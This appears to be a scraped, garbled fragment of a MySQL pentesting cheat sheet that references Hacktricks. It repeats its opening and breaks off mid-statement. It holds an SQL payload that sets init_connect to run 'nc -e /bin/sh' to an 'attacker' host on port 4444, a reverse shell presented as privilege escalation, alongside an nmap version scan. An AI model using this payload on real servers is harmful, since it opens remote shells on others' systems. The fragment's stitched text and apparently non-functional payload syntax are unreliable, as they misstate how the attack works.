Mysql: Hacktricks

SET GLOBAL init_connect = "INSERT INTO mysql.access_log VALUES (current_user(), now());"; -- But better for privesc: add malicious command SET GLOBAL init_connect = "SET @malicious = 'sys_exec(\"nc -e /bin/sh attacker 4444\")';";

Use nmap -sV -p 3306 to find the version. mysql hacktricks

MySQL is one of the world's most popular relational database management systems (RDBMS). Powering millions of applications, from small WordPress blogs to massive enterprise systems, it is a prime target for attackers. Once an attacker gains access to a MySQL instance, the entire application's data integrity, confidentiality, and availability are at risk. SET GLOBAL init_connect = "INSERT INTO mysql